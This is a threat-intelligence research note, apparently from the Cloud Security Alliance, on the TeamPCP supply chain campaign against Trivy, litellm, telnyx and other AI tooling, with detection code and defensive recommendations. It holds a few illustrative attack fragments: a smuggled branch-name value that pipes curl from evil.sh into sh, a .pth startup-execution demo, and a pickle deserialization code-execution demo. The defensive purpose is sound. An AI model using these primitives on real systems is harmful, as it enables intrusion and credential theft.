TeamPCP and the Cascading AI/ML Supply Chain Campaign

Authors: Cloud Security Alliance AI Safety Initiative
Published: 2026-03-29

Categories: AI Infrastructure Security, Supply Chain Security, Threat Intelligence


Key Takeaways

  • The TeamPCP threat group executed a cascading supply chain campaign in March 2026 that compromised the Trivy security scanner, two Checkmarx IDE extensions, the litellm PyPI package (~97 million monthly downloads), and the telnyx SDK within an eight-day window — demonstrating that one compromised tool can be weaponized to harvest credentials that unlock the next target in the chain [1][2][3].
  • The litellm package, which aggregates API credentials for over 100 large language model providers including OpenAI and Anthropic, was poisoned with a multi-stage credential stealer that auto-executed on every Python interpreter startup via a .pth file injection, requiring no explicit import statement from victim code [4][5].
  • The volume of newly identified malicious open source packages grew 188% year-over-year in Q2 2025; data exfiltration was the primary objective in 55% of detected malicious packages [6].
  • ML model files in Pickle format (.pkl, .pt, .bin) represent a structural blind spot for standard software composition analysis tooling; attackers are actively exploiting this gap to embed malicious payloads in fake AI SDK packages [7][8].
  • Threat intelligence reporting indicates that AI API credentials — keys for OpenAI, Anthropic, AWS Bedrock, and Google Vertex AI — have established direct monetization pathways in underground markets [4][15], making AI developer environments a high-priority target for credential-focused campaigns independent of the tradecraft sophistication required to exploit them.

Background

The Python Package Index (PyPI) is the primary distribution channel for the AI/ML software ecosystem. Foundational frameworks including PyTorch, Hugging Face Transformers, LangChain, LiteLLM, and the official SDKs for every major commercial LLM provider are distributed through PyPI, and virtually every AI developer environment has a dependency graph rooted in it. This centrality has made PyPI an attractive target for threat actors seeking access to the AI infrastructure layer.

The supply chain threat to PyPI is not new, but its character shifted materially between late 2024 and the first quarter of 2026. Earlier campaigns were largely opportunistic: individual actors registered typosquatted package names designed to catch developers who mistyped a legitimate dependency. The campaigns documented in this note represent a structural shift in adversary methodology. Sophisticated threat groups — including nation-state actors and organized criminal enterprises — have developed techniques for compromising the build and release pipelines of legitimate, widely trusted packages rather than relying on confusion or carelessness for initial access. Once inside a trusted package, the scale of a modern AI library’s download footprint transforms a single compromise into a platform-wide incident.

The attack surface is amplified by architectural properties specific to AI middleware. Packages like LiteLLM, LangChain, and similar orchestration libraries are provisioned with credentials for every downstream service they connect to: LLM provider API keys, cloud platform credentials, database connection strings, and CI/CD secrets. This makes the middleware layer a credential aggregation point whose compromise yields access far beyond the immediate host. The same logic applies to AI workflow orchestrators such as Langflow, discussed in a companion CSA research note published on the same date as this document. The credential aggregation pattern is a category-level risk, not a product-specific vulnerability.

Sonatype’s Q2 2025 data identified a cumulative total of 845,204 malicious open source packages discovered to date, 16,279 of them newly identified in Q2 2025 alone [6]. The trajectory shows the problem is not declining as awareness grows; the economics of targeting high-value AI credential stores are accelerating adversary investment in the space.


Security Analysis

TeamPCP: Cascading Compromise as an Attack Methodology

The TeamPCP group’s March 2026 campaign is among the most technically elaborate supply chain operations targeting the AI ecosystem, distinguished by its cascading structure: rather than mounting parallel independent attacks, TeamPCP used the compromise of one trusted tool to harvest the credentials necessary to compromise the next, creating a chain in which each link extends their access further into the AI developer toolchain.

The chain began on March 19, 2026, when TeamPCP exploited unsanitized GitHub Actions workflows in Trivy, Aqua Security’s widely used open-source container vulnerability scanner. Trivy’s release pipeline allowed user-controlled input — specifically, branch names — to reach execution contexts within the workflow without sanitization. This class of vulnerability, sometimes described as a “pwn request,” allows an external contributor to trigger arbitrary code execution inside a repository’s CI/CD environment simply by opening a pull request with a crafted branch name. Researchers estimated that thousands of CI/CD pipelines that ran Trivy as part of routine security scans during this window executed attacker-controlled code [3][9].
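
The injection pattern can be illustrated with a minimal GitHub Actions workflow; the snippet below is a hypothetical sketch of the vulnerability class, not Trivy’s actual release pipeline. A branch name containing shell metacharacters becomes executable code when an expression is interpolated directly into a run script:

```yaml
# Illustrative sketch of the "pwn request" class — not Trivy's workflow.
on: pull_request_target

jobs:
  vulnerable:
    runs-on: ubuntu-latest
    steps:
      # UNSAFE: ${{ }} expressions are substituted into the script text
      # before the shell runs, so a crafted branch name such as
      # x";curl evil.sh|sh;" executes in the pipeline's context.
      - run: echo "Scanning branch ${{ github.head_ref }}"

  safer:
    runs-on: ubuntu-latest
    steps:
      # SAFER: route untrusted input through an environment variable so
      # the shell treats it as data, never as code.
      - run: echo "Scanning branch $BRANCH"
        env:
          BRANCH: ${{ github.head_ref }}
```

The environment-variable indirection is the mitigation GitHub’s own hardening guidance recommends for untrusted event context in workflows.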

Using credentials harvested from Trivy’s pipeline compromise, TeamPCP accessed the GitHub account of a LiteLLM co-founder on March 23, 2026, and also compromised two Checkmarx IDE extensions distributed through OpenVSX: ast-results version 2.53 (approximately 36,000 downloads) and cx-dev-assist version 1.7.0 (approximately 500 downloads) [2]. On March 24, the group published poisoned versions of litellm — specifically versions 1.82.7 and 1.82.8 — to PyPI. Both versions remained live for approximately two to three hours before PyPI’s security team removed them [4][5]. On March 27, TeamPCP published two malicious versions of the telnyx SDK (versions 4.87.1 and 4.87.2, a package with approximately 3.75 million total downloads) using a novel delivery mechanism: the malicious payload was embedded in a WAV audio file with XOR-encrypted content concealed within audio frames — a steganographic technique that evades tools inspecting only source code and binary files [1][10].

Technical Profile of the LiteLLM Malware

The malware embedded in litellm 1.82.8 illustrates the degree to which supply chain attackers have tailored their tooling to the specific properties of AI infrastructure. At the persistence layer, the malware installed a .pth file — litellm_init.pth — into the Python environment’s site-packages directory. Python’s site module processes .pth files automatically during interpreter initialization, meaning the malicious payload executed on every Python invocation regardless of whether any application code imported litellm [4][5]. This persistence mechanism is significant because it defeats the common assumption that uninstalling a malicious package removes its effects; a .pth file placed during installation continues to execute even after the package itself has been removed.
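
The autorun behavior is easy to demonstrate with the standard library alone. The snippet below recreates the persistence primitive with a harmless payload and a temporary directory standing in for site-packages; `site.addsitedir()` triggers the same code path that runs automatically against site-packages at interpreter startup:

```python
import os
import site
import tempfile

# Python's site module exec()s any line in a .pth file that begins with
# "import" every time a site directory is processed — no application
# import of the package is required.
demo_dir = tempfile.mkdtemp()
pth_path = os.path.join(demo_dir, "litellm_init.pth")

# A single line; everything after the import statement is arbitrary code.
with open(pth_path, "w") as fh:
    fh.write('import os; os.environ["PTH_DEMO"] = "executed at startup"\n')

# In a real attack this fires during interpreter initialization because
# site-packages is processed automatically; addsitedir() exercises the
# same mechanism explicitly so the effect is visible here.
site.addsitedir(demo_dir)

print(os.environ.get("PTH_DEMO"))  # the payload line has already run
```

Because the payload rides on interpreter startup rather than on the package’s own code, it survives `pip uninstall litellm` unless the .pth file itself is found and removed.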

The payload’s exfiltration targets reflected an explicit focus on AI infrastructure credentials. The multi-stage collection pipeline gathered LLM provider API keys (OpenAI, Anthropic, Cohere, and others) from environment variables and configuration files, cloud platform credentials for AWS, GCP, and Azure, Kubernetes service account tokens, Docker configurations, CI/CD pipeline secrets, shell history, SSH keys, database credentials, and cryptocurrency wallet files [4]. Collected material was AES-256 encrypted with an RSA-4096 wrapped session key before transmission to the command-and-control domain models.litellm[.]cloud, a domain constructed to resemble LiteLLM’s legitimate infrastructure. Exfiltrated archives were delivered with the header X-Filename: tpcp.tar.gz, an artifact that provides a detection opportunity for network monitoring tools [4][5].

When a usable Kubernetes service account token was present, the malware attempted lateral movement by creating privileged pods with names matching the pattern node-setup-* that mounted the host root filesystem, enabling full node escape from containerized environments [4]. For systems with Iranian IP geolocation, a destructive kamikaze payload was delivered that wiped filesystems; all other systems received a persistent host-provisioner-std backdoor [4]. The geofencing behavior suggests the group was operating under constraints intended to limit collateral damage within a specific jurisdiction, though IP geolocation alone is an unreliable attribution signal and should be weighed accordingly.
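
As a detection sketch, the privileged-pod indicators can be checked by parsing `kubectl get pods -A -o json` output. The name pattern and hostPath heuristic below follow the reported IOCs; the helper name and sample records are fabricated for illustration:

```python
import fnmatch
import json

def suspicious_pods(pod_list_json: str) -> list:
    """Flag pods matching TeamPCP's node-setup-* naming pattern or
    mounting the host root filesystem via a hostPath volume."""
    findings = []
    for pod in json.loads(pod_list_json).get("items", []):
        name = pod["metadata"]["name"]
        spec = pod.get("spec", {})
        mounts_host_root = any(
            vol.get("hostPath", {}).get("path") == "/"
            for vol in spec.get("volumes", [])
        )
        if fnmatch.fnmatch(name, "node-setup-*") or mounts_host_root:
            findings.append(name)
    return findings

# Feed this the output of: kubectl get pods -A -o json
sample = json.dumps({"items": [
    {"metadata": {"name": "node-setup-x7f2"},
     "spec": {"volumes": [{"name": "host", "hostPath": {"path": "/"}}]}},
    {"metadata": {"name": "web-frontend-abc"}, "spec": {"volumes": []}},
]})
print(suspicious_pods(sample))  # ['node-setup-x7f2']
```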

The AI Middleware Aggregation Problem

LiteLLM’s role in the campaign is not incidental. The package was selected because its function — acting as a universal proxy between applications and over 100 LLM provider APIs — requires it to hold credentials for every provider its deploying organization uses. A single LiteLLM instance in a production environment may simultaneously hold API keys for OpenAI, Anthropic, AWS Bedrock, Google Vertex AI, and a half-dozen additional providers, alongside the cloud credentials for the infrastructure on which it runs. Downstream users of LiteLLM at the time of the attack included Netflix, Stripe, Google, CrewAI, DSPy, and MLflow [1][2]. The 97 million monthly downloads illustrate the scale of potential exposure: among those users, every organization running LiteLLM in a production environment with configured provider credentials was at risk of credential exfiltration.

This aggregation pattern — one middleware package holding credentials for an entire organization’s AI stack — is structurally shared by LangChain, AutoGen, similar orchestration frameworks, and the LLM-as-a-service APIs they connect to. The attack on LiteLLM is properly read as a proof of concept for a category of attack, not solely as a campaign against a specific package. Organizations evaluating their AI supply chain risk should map the credential dependencies of every AI middleware component in their environment.

Earlier Campaigns in the Attack Series

The TeamPCP campaign emerged from a broader pattern of supply chain attacks against AI/ML Python packages that intensified through 2024 and 2025.

In December 2024, the ultralytics package — the YOLO computer vision library with 61 million downloads and 33,700 GitHub stars — was backdoored to deliver an XMRig Monero cryptominer targeting GPU compute [11][12]. The attack method was identical in structure to TeamPCP’s approach: a “pwn request” exploiting unsanitized GitHub Actions workflows in the package’s release pipeline. Four versions (8.3.41, 8.3.42, 8.3.45, and 8.3.46) were affected. The real-world signal of the attack’s success came from Google Colab, whose automated abuse-detection systems began banning users who had imported the library — a consequence of GPU resources on Colab’s infrastructure being redirected to mining operations [11][13]. The Ultralytics incident produced a detailed post-mortem from the Python Software Foundation and PyPI that informed subsequent hardening efforts.

North Korea’s Lazarus Group has maintained a sustained presence in PyPI and npm targeting AI and developer tool packages under the campaign codenamed “Graphalgo.” Sonatype attributed 234 unique malware packages to Lazarus in just the first half of 2025, with over 30,050 downloads across PyPI and npm [15][14]. The group’s preferred distribution mechanism is a versioned bait-and-switch: an initial benign package version accumulates genuine downloads and positive reputation, after which a subsequent version containing the malicious payload is published. This technique defeats reputation-based package selection, where developers choose packages by download count, since the accumulated count was earned legitimately. Lazarus campaigns have specifically targeted AI research environments, likely for state-level intelligence gathering on AI model development and training data [14].

In May 2025, three packages impersonating Alibaba Cloud AI Labs SDKs were discovered on PyPI. These packages exploited a structural gap in standard software composition analysis tooling: rather than embedding malicious code in Python source files where SCA scanners would detect it, the packages loaded malicious PyTorch model files stored in Pickle format through their __init__.py initialization routines [7][8]. Security tools at the time of discovery did not scan the contents of ML model files (.pkl, .pt, .bin) for executable payloads, making the malicious payload undetectable to SCA tools focused on source and binary analysis. Malicious code executed upon model deserialization exfiltrated system and network configuration to attacker-controlled servers [7].
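
The deserialization primitive these packages abused, and one static triage approach, can be sketched in a few lines of standard-library Python. The "model" class and risky-module list below are illustrative, not taken from the actual malware:

```python
import io
import pickle
import pickletools

class FakeModelWeights:
    """Pickle's __reduce__ hook lets an object name an arbitrary callable
    that pickle.load() invokes during deserialization."""
    def __reduce__(self):
        # A real payload would reference os.system or similar; eval of a
        # harmless expression stands in for attacker-chosen code.
        return (eval, ("6 * 7",))

blob = pickle.dumps(FakeModelWeights())
print(pickle.loads(blob))  # 42 — "loading the model" ran attacker code

# Static triage without ever deserializing: walk the opcode stream and
# collect the modules a pickle would import when loaded.
RISKY_MODULES = {"os", "posix", "nt", "subprocess", "builtins"}

def pickle_imports(data: bytes) -> set:
    found, strings = set(), []
    for opcode, arg, _pos in pickletools.genops(io.BytesIO(data)):
        if opcode.name == "GLOBAL":            # "module name" in one arg
            found.add(str(arg).split()[0])
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            found.add(strings[-2])             # module pushed before name
        if opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)
    return found

print(sorted(pickle_imports(blob) & RISKY_MODULES))  # ['builtins']
```

The opcode-level scan is the same idea dedicated model-scanning tools implement, and it is why the safetensors format, which carries no executable opcodes at all, closes this gap by design.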

Two packages published in November 2023 and active for over a year before detection — gptplus (impersonating the OpenAI SDK) and claudeai-eng (impersonating Anthropic’s Claude SDK) — accumulated 1,700 downloads across the United States, China, France, Germany, and Russia [16]. Both packages provided partial legitimate functionality — scraping LLM responses through proxy interfaces — to reduce the likelihood of user-initiated removal, while simultaneously delivering the JarkaStealer malware, which performed browser credential theft, session token exfiltration from Telegram, Discord, and Steam, system screenshots, and comprehensive system profiling [16][17].

Slopsquatting: The Emerging Pre-Attack Surface

Beyond the active campaigns, a structural vulnerability in how AI-assisted development generates dependency lists creates a new pre-attack surface. Research published at USENIX Security 2025 documented that large language models hallucinate plausible-sounding but nonexistent package names in approximately 19.7% of package suggestions [18]. The practice of registering hallucinated package names — described as “slopsquatting” — allows adversaries to establish malicious packages at names that AI coding assistants will suggest, before any developer thinks to check whether those names are already registered. As LLM-assisted development becomes increasingly common among AI and Python developers, the slopsquatting attack surface is likely to expand in proportion.


Recommendations

Immediate Actions

Organizations using Python-based AI infrastructure should audit their environments for evidence of TeamPCP’s known indicators of compromise. Specifically, security teams should search for the presence of .pth files in site-packages directories — particularly litellm_init.pth or analogous files not traceable to legitimate package installations — and examine currently installed versions of litellm and telnyx to confirm they are not running one of the identified malicious versions (litellm 1.82.7, 1.82.8; telnyx 4.87.1, 4.87.2). Any environment that ran these versions should treat all credentials present in that environment as compromised and initiate credential rotation across all LLM provider APIs, cloud platform credentials, Kubernetes service accounts, database connections, and CI/CD pipeline secrets.
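
A minimal audit helper for the known-bad versions might look like the following sketch; the function names are ours, while the version list comes from the reporting cited above:

```python
from importlib import metadata

# Known-bad versions from the TeamPCP campaign as reported in [1][4].
COMPROMISED = {
    "litellm": {"1.82.7", "1.82.8"},
    "telnyx": {"4.87.1", "4.87.2"},
}

def is_compromised(pkg: str, version: str) -> bool:
    """True when an exact package/version pair matches a known IOC."""
    return version in COMPROMISED.get(pkg, set())

def check_environment() -> list:
    """Return (package, installed_version) pairs matching known-bad IOCs
    for the interpreter environment this script runs in."""
    hits = []
    for pkg in COMPROMISED:
        try:
            installed = metadata.version(pkg)
        except metadata.PackageNotFoundError:
            continue  # package not installed in this environment
        if is_compromised(pkg, installed):
            hits.append((pkg, installed))
    return hits

print(check_environment())
```

Run the check once per Python environment (each virtualenv, container image, and CI runner has its own site-packages), since a clean result in one environment says nothing about the others.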

Organizations using the Checkmarx ast-results or cx-dev-assist IDE extensions should verify they are not running the compromised versions (2.53 and 1.7.0 respectively) and review developer workstations that had these extensions installed for signs of credential exfiltration to checkmarx[.]zone [2].

Detection teams should add network monitoring rules for outbound traffic to models.litellm[.]cloud and HTTP transfers carrying the header X-Filename: tpcp.tar.gz, and should search system logs for process creation events associated with ~/.config/sysmon/sysmon.py and systemd user units created by packages [4][5]. Kubernetes environments should audit for pods matching the node-setup-* naming pattern and review any recently created privileged pod definitions for unexpected host path mounts.
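
As an illustration, the reported network IOCs can be matched against parsed proxy or flow records with a simple helper. The function and record shape below are assumptions; only the domain and header values come from the cited reporting:

```python
# Network IOCs from the Datadog and Sonatype analyses [4][5].
IOC_DOMAINS = {"models.litellm.cloud"}
IOC_HEADERS = {"x-filename": "tpcp.tar.gz"}

def match_http_iocs(host: str, headers: dict) -> list:
    """Return IOC hits for one outbound HTTP request record, e.g. a row
    parsed from proxy or Zeek logs (header names matched case-insensitively)."""
    hits = []
    if host.lower() in IOC_DOMAINS:
        hits.append(f"C2 domain: {host}")
    for name, value in headers.items():
        expected = IOC_HEADERS.get(name.lower())
        if expected is not None and value == expected:
            hits.append(f"IOC header: {name}: {value}")
    return hits

print(match_http_iocs(
    "models.litellm.cloud",
    {"X-Filename": "tpcp.tar.gz", "Content-Type": "application/octet-stream"},
))
```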

Short-Term Mitigations

The most structurally impactful mitigation for the class of attack demonstrated by TeamPCP against both Trivy and Ultralytics is the adoption of OIDC-based Trusted Publishers for all internal and maintained PyPI packages. Trusted Publishers eliminate the long-lived API tokens that attackers harvested from pipeline environments; by coupling publish rights to ephemeral, identity-bound OIDC tokens, the credential chain that enabled TeamPCP’s cascading compromise is broken [13]. PyPI had enrolled over 50,000 projects in Trusted Publishers by the end of 2025, but adoption remains incomplete across the ecosystem [19]. All organizations that maintain Python packages should prioritize this migration.

For packages consumed from PyPI, version pinning with cryptographic hash verification — using pip install --require-hashes or equivalent mechanisms in pip-compile generated requirements files — prevents the installation of packages modified after the version was published. Because the malicious litellm releases were published as new version numbers rather than modifications of existing releases, any environment with a pinned dependency tree would not have pulled them automatically [5]. Hash pinning is effective only when combined with a process for reviewing and approving dependency updates, since a pinned dependency that is never updated still carries its own risk profile.
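
The check pip performs under --require-hashes amounts to recomputing an artifact’s SHA-256 and comparing it against the pin; a simplified sketch:

```python
import hashlib
import os
import tempfile

def artifact_matches_pin(path: str, pinned_sha256: str) -> bool:
    """Recompute an artifact's digest in chunks and compare it to the
    pinned hash, mirroring pip's hash-checking mode."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest() == pinned_sha256

# Demo with a stand-in file; in practice `path` is a downloaded wheel and
# the pin comes from a requirements.txt line such as:
#   litellm==1.81.0 --hash=sha256:<digest>
fd, path = tempfile.mkstemp()
os.write(fd, b"wheel bytes")
os.close(fd)
pin = hashlib.sha256(b"wheel bytes").hexdigest()
print(artifact_matches_pin(path, pin))  # True
```

Any byte-level tampering with the artifact, including a republished file under the same version number, changes the digest and fails the check.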

CI/CD pipelines that invoke third-party tools as part of build or security scanning workflows should pin those tools to explicit SHA-based references rather than floating version tags. The Trivy compromise was enabled by GitHub Actions workflows that fetched tool versions by tag rather than commit hash; pinning @latest or a version tag provides no protection against tag reassignment by an attacker who has compromised the upstream repository. SHA-pinned Actions are resilient to this class of attack; because a SHA references an immutable object, an attacker who reassigns a version tag cannot redirect pipelines that reference the hash directly [3][9].
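
Schematically, the difference looks like this in a workflow step; the action name is real, but the commit SHA below is a placeholder, not an actual trivy-action release commit:

```yaml
steps:
  # Fragile: a version tag can be silently reassigned by an attacker who
  # controls the upstream repository.
  - uses: aquasecurity/trivy-action@0.28.0

  # Resilient: a full-length commit SHA references an immutable object;
  # tag reassignment cannot redirect this reference.
  # (SHA shown is a placeholder — resolve the real commit before pinning.)
  - uses: aquasecurity/trivy-action@a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0  # v0.28.0
```

Dependency-update tooling such as Dependabot can keep SHA-pinned references current so the pin does not ossify.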

The .pth file persistence mechanism used by the LiteLLM malware represents an undermonitored attack surface in Python environments. Security teams should implement file integrity monitoring for Python site-packages directories, with alerting on the creation of new .pth files. In containerized or serverless environments where base images are rebuilt on each deployment, this control is provided naturally by immutable infrastructure patterns.
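
Where a dedicated FIM product is not available, a baseline-and-diff sketch over site-packages .pth files can be built from the standard library; the helper names are illustrative:

```python
import hashlib
import site
from pathlib import Path

def pth_snapshot() -> dict:
    """Hash every .pth file across this interpreter's site-packages
    directories. Persist the result and diff on a schedule."""
    snapshot = {}
    dirs = site.getsitepackages() + [site.getusersitepackages()]
    for directory in dirs:
        d = Path(directory)
        if not d.is_dir():
            continue
        for pth in d.glob("*.pth"):
            snapshot[str(pth)] = hashlib.sha256(pth.read_bytes()).hexdigest()
    return snapshot

def diff_snapshots(baseline: dict, current: dict) -> dict:
    """Return .pth files that appeared or changed since the baseline."""
    return {
        path: digest
        for path, digest in current.items()
        if baseline.get(path) != digest
    }

print(len(pth_snapshot()), ".pth files in this environment")
```

A new entry in the diff output after a `pip install` is exactly the signal that would have surfaced litellm_init.pth at installation time.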

Strategic Considerations

Organizations with significant AI infrastructure should conduct a credential dependency mapping exercise that documents which packages and services hold credentials for which downstream systems. The goal of this exercise is to identify the packages whose compromise would yield the broadest lateral movement capability — the packages most analogous to LiteLLM’s position in the TeamPCP campaign — and apply additional scrutiny to their dependency management, upgrade cadence, and runtime monitoring. For packages at the apex of an organization’s credential dependency graph, the acceptable threshold for verification before deployment should be higher than for packages with narrow access.

The Pickle-based model poisoning technique documented in the May 2025 Alibaba AI SDK campaign underscores that standard SCA tooling is not sufficient for AI/ML environments. Organizations consuming pre-trained models, fine-tuned weights, or third-party model artifacts should adopt the safetensors format wherever possible, as it prohibits arbitrary code execution during deserialization by design [7][8]. For environments where Pickle-format models cannot be immediately replaced, dedicated scanning tools capable of static analysis of serialized model files should be evaluated and deployed as a compensating control. This is a genuinely new category of tooling requirement that has no equivalent in traditional application security programs.

Private package mirrors with allowlisting represent the most robust architectural control for production AI infrastructure. An environment that installs only from an internally vetted mirror eliminates exposure to new PyPI-based attacks as an initial distribution vector, substantially reducing the attack surface documented in this note. The mirror’s vetting process and update pipeline become the new trust boundary and must be secured accordingly. For organizations with significant production AI infrastructure, the risk reduction of a private mirror typically justifies the operational investment; smaller teams may find repository firewall tools a more proportionate starting point. Tools such as Sonatype Firewall or Socket provide automated behavioral analysis of packages as they are requested, blocking malicious versions before they reach developer or production environments [6][20].

Finally, AI developer workflows that incorporate LLM-assisted coding should establish a practice of verifying suggested package names before installation. Given the 19.7% hallucination rate documented for package name suggestions, development teams should treat any unfamiliar package name generated by a coding assistant as unverified until confirmed [18]. Because slopsquatting attackers preemptively register hallucinated names, mere existence on PyPI is not confirmation: the check should establish that the package is the intended, legitimately maintained project — its publisher, linked repository, and release history — not merely that the name resolves. This check takes minutes and substantially reduces exposure to slopsquatting.
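
A triage helper might combine PEP 503 name normalization with PyPI’s JSON metadata endpoint; the helper names are ours, and inspecting the returned metadata remains a manual judgment step:

```python
import json
import re
import urllib.error
import urllib.request

def normalize(name: str) -> str:
    """PEP 503 name normalization, matching how PyPI deduplicates names."""
    return re.sub(r"[-_.]+", "-", name).lower()

def pypi_metadata(name: str):
    """Fetch a package's JSON metadata from PyPI; returns None when the
    name is unregistered. Existence alone is NOT proof of legitimacy —
    review the maintainer, linked repository, and release history."""
    url = f"https://pypi.org/pypi/{normalize(name)}/json"
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as exc:
        if exc.code == 404:
            return None
        raise

# Example triage for an assistant-suggested name (performs a network call):
# meta = pypi_metadata("litellm")
# if meta is None:
#     print("unregistered name — candidate slopsquatting target")
# else:
#     print(meta["info"]["project_urls"], meta["info"]["author"])

print(normalize("LiteLLM"))  # litellm
```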


CSA Resource Alignment

The attack patterns documented in this note map to several threat layers and control domains within the CSA AI safety and cloud security frameworks.

The MAESTRO framework for agentic AI threat modeling identifies the AI/ML pipeline as a primary attack surface (Layer 2: Data Operations) and the tool and integration ecosystem as a distinct threat layer (Layer 5: External Integrations). TeamPCP’s strategy of targeting middleware packages that aggregate credentials across multiple LLM providers is a direct exploitation of the Layer 5 trust relationships that agentic AI architectures depend on. MAESTRO’s guidance on supply chain integrity for model artifacts and tools is directly applicable to the controls described in this note.

The AI Controls Matrix (AICM) provides a framework for evaluating supply chain risk controls in AI environments. Relevant control domains include those governing third-party dependency management, artifact integrity verification, and runtime environment monitoring. The AICM’s emphasis on continuous supply chain monitoring is validated by the speed of this campaign: the window between malicious package publication and removal was measured in hours, not days, making continuous monitoring tools — rather than periodic auditing — the appropriate control class.

The CSA AI Organizational Responsibilities series addresses the governance dimension of AI supply chain risk, including the responsibilities of security, development, and procurement functions in evaluating the risk profile of AI middleware components. The credential aggregation pattern exploited by TeamPCP highlights a governance gap that many organizations have yet to close: documenting and monitoring which packages hold credentials for which downstream systems. Organizations that had inventoried the credentials held by their AI orchestration layer would have been in a stronger position to scope the impact of the compromise and prioritize their response.

CSA’s Zero Trust guidance is directly applicable to the Kubernetes lateral movement capability demonstrated by the LiteLLM malware. Zero Trust principles — specifically workload identity, least-privilege service account permissions, and pod security admission controls — would have constrained the blast radius of a successful compromise even when initial access to the Python environment was achieved. A Kubernetes cluster configured with the principle of least privilege, where service accounts hold only the permissions required for their specific workload, is significantly more resilient to the node-setup-* privileged pod creation technique than a cluster with permissive RBAC configurations.

The Cloud Controls Matrix (CCM) Supply Chain Management, Transparency, and Accountability (STA) domain, including STA-01 through STA-09, provides concrete control requirements for organizations seeking to formalize their approach to open source dependency risk. While the CCM was designed primarily for cloud service provider relationships, its STA controls are broadly applicable to the package dependency relationships that define modern AI software stacks.


References

  1. Help Net Security, “LiteLLM PyPI packages compromised in expanding TeamPCP supply chain attacks,” March 25, 2026, https://www.helpnetsecurity.com/2026/03/25/teampcp-supply-chain-attacks/
  2. Wiz, “Three’s a Crowd: TeamPCP Trojanizes LiteLLM in Continuation of Campaign,” March 2026, https://www.wiz.io/blog/threes-a-crowd-teampcp-trojanizes-litellm-in-continuation-of-campaign
  3. SANS Institute, “When a Security Scanner Became a Weapon: Inside the TeamPCP Supply Chain Campaign,” March 2026, https://www.sans.org/blog/when-security-scanner-became-weapon-inside-teampcp-supply-chain-campaign
  4. Datadog Security Labs, “LiteLLM and Telnyx Compromised on PyPI: Tracing the TeamPCP Supply Chain Campaign,” March 2026, https://securitylabs.datadoghq.com/articles/litellm-compromised-pypi-teampcp-supply-chain-campaign/
  5. Sonatype, “Compromised litellm PyPI Package Delivers Multi-Stage Credential Stealer,” March 2026, https://www.sonatype.com/blog/compromised-litellm-pypi-package-delivers-multi-stage-credential-stealer
  6. Sonatype, “Open Source Malware Index Q2 2025,” July 2025, https://www.sonatype.com/blog/open-source-malware-index-q2-2025
  7. ReversingLabs, “Malicious Attack Method on Hosted ML Models Now Targets PyPI,” May 2025, https://www.reversinglabs.com/blog/malicious-attack-method-on-hosted-ml-models-now-targets-pypi
  8. CSO Online, “Poisoned Models in Fake Alibaba SDKs Show Challenges of Securing AI Supply Chains,” May 2025, https://www.csoonline.com/article/3998351/poisoned-models-hidden-in-fake-alibaba-sdks-show-challenges-of-securing-ai-supply-chains.html
  9. Snyk, “How a Poisoned Security Scanner Became the Key to Backdooring LiteLLM,” March 2026, https://snyk.io/articles/poisoned-security-scanner-backdooring-litellm/
  10. Infosecurity Magazine, “TeamPCP Targets Telnyx Package in Latest PyPI Software Supply Chain Attack,” March 2026, https://www.infosecurity-magazine.com/news/teampcp-targets-telnyx-pypi-package/
  11. Bleeping Computer, “Ultralytics AI Model Hijacked to Infect Thousands with Cryptominer,” December 2024, https://www.bleepingcomputer.com/news/security/ultralytics-ai-model-hijacked-to-infect-thousands-with-cryptominer/
  12. ReversingLabs, “Compromised Ultralytics PyPI Package Delivers Crypto Coinminer,” December 2024, https://www.reversinglabs.com/blog/compromised-ultralytics-pypi-package-delivers-crypto-coinminer
  13. Python Package Index Blog, “Supply-Chain Attack Analysis: Ultralytics,” December 11, 2024, https://blog.pypi.org/posts/2024-12-11-ultralytics-attack-analysis/
  14. The Hacker News, “Lazarus Campaign Plants Malicious Packages in npm and PyPI Ecosystems,” February 2026, https://thehackernews.com/2026/02/lazarus-campaign-plants-malicious.html
  15. Sonatype, “How North Korea-Backed Lazarus Group Is Weaponizing Open Source,” 2025, https://www.sonatype.com/resources/whitepapers/how-lazarus-group-is-weaponizing-open-source
  16. Kaspersky, “Kaspersky Uncovers Year-Long PyPI Supply Chain Attack Using AI Chatbot Tools as Lure,” 2024, https://www.kaspersky.com/about/press-releases/kaspersky-uncovers-year-long-pypi-supply-chain-attack-using-ai-chatbot-tools-as-lure
  17. Snyk Labs, “Malware in LLM Python Package Supply Chains,” 2025, https://labs.snyk.io/resources/malware-in-llm-python-package-supply-chains/
  18. Joseph Spracklen, Raveen Wijewickrama, A.H.M. Nazmus Sakib, Anindya Maiti, Bimal Viswanath, Murtuza Jadliwala, “We Have a Package for You! A Comprehensive Analysis of Package Hallucinations by Code Generating LLMs,” USENIX Security Symposium 2025, https://www.usenix.org/system/files/conference/usenixsecurity25/sec25cycle1-prepub-742-spracklen.pdf (DOI: https://doi.org/10.5281/zenodo.14676377; see also: https://nesbitt.io/2025/12/10/slopsquatting-meets-dependency-confusion.html)
  19. PyPI, “2025 Year in Review,” January 2026, https://blog.pypi.org/posts/2025-12-31-pypi-2025-in-review/
  20. Socket, “Supply Chain Attack Detection for Python and JavaScript Packages,” https://socket.dev/